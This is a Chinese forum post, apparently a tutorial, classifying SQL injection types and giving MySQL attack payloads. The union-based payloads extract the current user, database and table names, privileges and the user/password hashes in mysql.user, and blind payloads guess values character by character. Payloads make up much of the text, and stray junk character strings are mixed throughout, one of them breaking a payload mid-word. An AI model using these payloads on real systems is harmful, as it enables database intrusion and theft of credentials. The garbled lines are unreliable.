放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。3 p. ^ I, r5 q# i; }0 X9 H
- @( j& C& T4 V& [% Q这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表9 M% z* I4 L; T# d
r0 I1 [. t1 v9 N; X* R ?
分类标准 分类 备注0 H# e3 o: Y( j: O
按字段类型 整型注入,字符型注入
/ T! ~1 W8 H5 {+ E( D( W! ~ t按出现的位置 get注入,post注入,cookie注入,http header注入 : u- N, x- F1 S2 V
然而高级注入是这样的% W8 N2 e* z+ }0 B/ V) X8 N; g
! f3 j& ~) ~ h$ O
高级注入分类 条件2 A# A# L0 Z' Z2 u( G8 H7 r5 ]# v: [; c- F
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
4 V3 Z0 p: i* B& aunion-based sql 能够使用union,存在数据库,表结构9 E. V* R- r5 c
blind sql 存在注入
$ q' E* ~9 F3 @6 d2 ~我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。! q/ A* k/ s& x7 G! G/ V# Z0 o; d
( @9 v+ e* ]2 J! n; {
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
# p+ }$ ?3 q( j: A5 H " ]0 h. }# D1 c: K0 u* Z+ Z5 j
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。- K; f3 `+ J; f
& g8 I/ d/ t) V9 b: M0 f0 p! H
这里用mysql说明1 [$ Z' v- K% Z, b3 c: x3 H
3 H \# ?& E0 @+ r' d# L
e注入坛子里很多了,请看戳我或者再戳我3 }( D( h" }$ f9 R! \) ^
& C% L5 y& R- T9 r! }u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
' R5 x8 _$ ^; b7 e" E- ?
1 T: U9 K0 R9 j获取当前数据库用户名
5 z& M6 h5 o6 x0 T 1 `" \: i, E# ?6 f+ \
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C% J9 I8 y' Y" g" H+ M( m
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL: m! F8 i3 J: y2 N& }8 ]
L, NULL#
* p5 d7 ]% V; ~. r注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。$ y, d: b7 c* b7 g
) ]5 z% U, ?6 U$ _, |( v- n获取数据库名9 U" J1 T# y a" d0 g8 p4 @
( @7 c. a( Y: c4 D
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#$ u' `* f0 V7 @" {% P6 a! N. U
获取所有用户名
0 y- @; H( a, a* C y, Q
( i9 u$ l6 M/ w; s2 O1 R$ B1 bUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
8 W5 E- h9 M3 y a1 @查看当前用户权限
+ y# j X' H2 w" X. S& F9 @6 k # r9 {# ^: O# n% x3 g# X, R# t8 E
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
! T! t- v6 v* u5 z, Q尝试获取密码,当然需要有能读mysql数据库的权限% k. Y, z' j* _8 @# S
f7 P( Y- i0 SUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user## t. g5 \# ~1 D4 ], y
获取表名,limit什么的自己搞啦! {5 [2 ?, `& }7 L
$ W9 w: g: r& n$ b
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
! A. b# A7 F _8 V获取字段名及其类型
+ {- [ X! x) V0 D' k& r4 V6 {UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
% {3 T2 x* D! F" p2 x' F; o
& V+ W3 ~$ ^) F Q! u4 t4 ?3 Pb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。: E7 { V6 M! f+ y# w
# V. | [3 W4 l5 q3 ~/ V如:
8 K9 U8 g D$ \5 E1 c获取当前用户名
& X' w8 `! x1 e" u" h% }8 @
, [. Y6 Q8 Y5 o. Q3 DAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
, [& N n4 v9 [) q& g获取当前数据库
& Q X- J! ~4 r) n9 T . q% g3 X, X' i+ p* v6 @
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
0 B* R; R k o) `获取表名
$ }# {+ x* [# U8 L$ H* @
- `# C7 x# v: |% Y2 }, x/ SAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51 R0 W$ j! [5 [/ Z9 s; x: { U. t
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。! |- O+ I9 |4 H f3 n. X1 a7 E
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
3 @, q- |& t& |爆表
9 `/ D! n& X9 H: L" C) q, _% ^ * C3 C9 V0 S2 {0 T- c/ p* |% ]
AND EXISTS(select * from table)9 r$ R' C$ d* N. l$ z9 }+ ]& g
爆字段% e5 b* R( N; ?
8 y; q- r. Z( P% K9 B1 @
AND EXISTS(select pwd from table)1 k% [9 E) A5 [. O. y& N1 k9 H
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
7 p9 |" r$ @/ ^; ?, t& a; h( \
8 _% t7 `6 V+ R! c本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。8 v% ~. l1 N! b: G4 s9 v& ^
|